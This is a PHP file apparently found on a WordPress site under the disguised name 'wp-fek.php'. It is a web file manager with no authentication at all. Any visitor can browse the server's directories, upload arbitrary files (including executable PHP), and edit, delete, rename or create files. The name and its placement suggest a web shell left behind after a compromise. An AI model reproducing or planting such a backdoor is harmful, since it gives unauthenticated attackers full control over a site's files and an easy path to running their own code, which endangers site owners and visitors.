File: /var/www/html/acquasorgente.webmapp.it/wp-fek.php
<?php
session_start();
function sanitizePath($path) {
// Path traversal koruması ve gerçek dizini alma
$real = realpath($path);
return ($real !== false && is_dir($real)) ? $real : getcwd();
}
$currentDir = isset($_GET['dir']) ? sanitizePath($_GET['dir']) : getcwd();
function listDir($dir) {
$items = array_diff(scandir($dir), ['.', '..']);
echo "<h3>Current Directory: " . htmlspecialchars($dir) . "</h3><ul>";
foreach ($items as $item) {
$fullPath = realpath($dir . DIRECTORY_SEPARATOR . $item);
if (!$fullPath) continue;
$itemEscaped = htmlspecialchars($item);
if (is_dir($fullPath)) {
echo "<li>📁 <a href='?dir=" . urlencode($fullPath) . "'>$itemEscaped</a></li>";
} else {
echo "<li>📄 $itemEscaped
[<a href='?dir=" . urlencode($dir) . "&action=edit&file=" . urlencode($item) . "'>Edit</a>]
[<a href='?dir=" . urlencode($dir) . "&action=delete&file=" . urlencode($item) . "' onclick='return confirm(\"Delete this file?\");'>Delete</a>]
[<a href='?dir=" . urlencode($dir) . "&action=rename&file=" . urlencode($item) . "'>Rename</a>]
</li>";
}
}
echo "</ul>";
}
function handleUpload($dir) {
if (!empty($_FILES['upload']['name'])) {
$target = $dir . DIRECTORY_SEPARATOR . basename($_FILES['upload']['name']);
if (move_uploaded_file($_FILES['upload']['tmp_name'], $target)) {
echo "<p style='color:green;'>Upload successful.</p>";
} else {
echo "<p style='color:red;'>Upload failed.</p>";
}
}
}
function createFolder($dir) {
$folderName = trim($_POST['new_folder'] ?? '');
if ($folderName !== '') {
$newFolder = $dir . DIRECTORY_SEPARATOR . basename($folderName);
if (!file_exists($newFolder)) {
if (mkdir($newFolder, 0777, true)) {
echo "<p style='color:green;'>Folder '$folderName' created.</p>";
} else {
echo "<p style='color:red;'>Failed to create folder.</p>";
}
} else {
echo "<p>Folder already exists.</p>";
}
}
}
function createFile($dir) {
$fileName = trim($_POST['new_file'] ?? '');
if ($fileName !== '') {
$newFile = $dir . DIRECTORY_SEPARATOR . basename($fileName);
if (!file_exists($newFile)) {
if (file_put_contents($newFile, '') !== false) {
echo "<p style='color:green;'>File '$fileName' created.</p>";
} else {
echo "<p style='color:red;'>Failed to create file.</p>";
}
} else {
echo "<p>File already exists.</p>";
}
}
}
function editFile($file) {
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['content'])) {
if (file_put_contents($file, $_POST['content']) !== false) {
echo "<p style='color:green;'>Changes saved.</p>";
} else {
echo "<p style='color:red;'>Failed to save changes.</p>";
}
}
$content = is_readable($file) ? htmlspecialchars(file_get_contents($file)) : '';
echo "<form method='POST'>
<textarea name='content' style='width:100%; height:300px;'>{$content}</textarea><br>
<button type='submit'>Save</button>
<a href='?dir=" . urlencode(dirname($file)) . "' style='margin-left:10px;'>Back</a>
</form>";
}
function deleteFile($file) {
if (file_exists($file)) {
if (unlink($file)) {
echo "<p style='color:green;'>File deleted.</p>";
} else {
echo "<p style='color:red;'>Could not delete file.</p>";
}
} else {
echo "<p>File does not exist.</p>";
}
}
function renameFile($file) {
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST['new_name'])) {
$newName = basename($_POST['new_name']);
$newPath = dirname($file) . DIRECTORY_SEPARATOR . $newName;
if (rename($file, $newPath)) {
echo "<p style='color:green;'>Renamed successfully.</p>";
echo "<a href='?dir=" . urlencode(dirname($newPath)) . "'>Back to directory</a>";
return;
} else {
echo "<p style='color:red;'>Rename failed.</p>";
}
}
echo "<form method='POST'>
<input type='text' name='new_name' placeholder='New file/folder name' required>
<button type='submit'>Rename</button>
<a href='?dir=" . urlencode(dirname($file)) . "' style='margin-left:10px;'>Cancel</a>
</form>";
}
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_FILES['upload'])) {
handleUpload($currentDir);
}
if (isset($_POST['new_folder'])) {
createFolder($currentDir);
}
if (isset($_POST['new_file'])) {
createFile($currentDir);
}
}
if (isset($_GET['action'], $_GET['file'])) {
$filePath = realpath($currentDir . DIRECTORY_SEPARATOR . basename($_GET['file']));
if ($filePath && strpos($filePath, $currentDir) === 0 && is_file($filePath)) {
switch ($_GET['action']) {
case 'edit':
editFile($filePath);
exit;
case 'delete':
deleteFile($filePath);
break;
case 'rename':
renameFile($filePath);
exit;
default:
echo "<p style='color:red;'>Invalid action.</p>";
}
} else {
echo "<p style='color:red;'>Invalid file specified.</p>";
}
}
$parentDir = dirname($currentDir);
echo "<style>
body { background:#eef0f5; font-family:sans-serif; text-align:center; }
form { margin: 15px auto; max-width: 500px; }
input, button, textarea { padding: 8px; margin:5px 0; width: 90%; }
a { text-decoration:none; color:#337ab7; }
a:hover { text-decoration:underline; }
ul { list-style:none; padding-left:0; }
li { margin: 6px 0; }
</style>";
echo "<a href='?dir=" . urlencode($parentDir) . "'>⬅️ Parent Directory</a>";
listDir($currentDir);
echo "<h3>Upload File</h3>
<form method='POST' enctype='multipart/form-data'>
<input type='file' name='upload' required>
<button type='submit'>Upload</button>
</form>";
echo "<h3>Create New Folder</h3>
<form method='POST'>
<input type='text' name='new_folder' placeholder='Folder Name' required>
<button type='submit'>Create Folder</button>
</form>";
echo "<h3>Create New File</h3>
<form method='POST'>
<input type='text' name='new_file' placeholder='File Name' required>
<button type='submit'>Create File</button>
</form>";
?>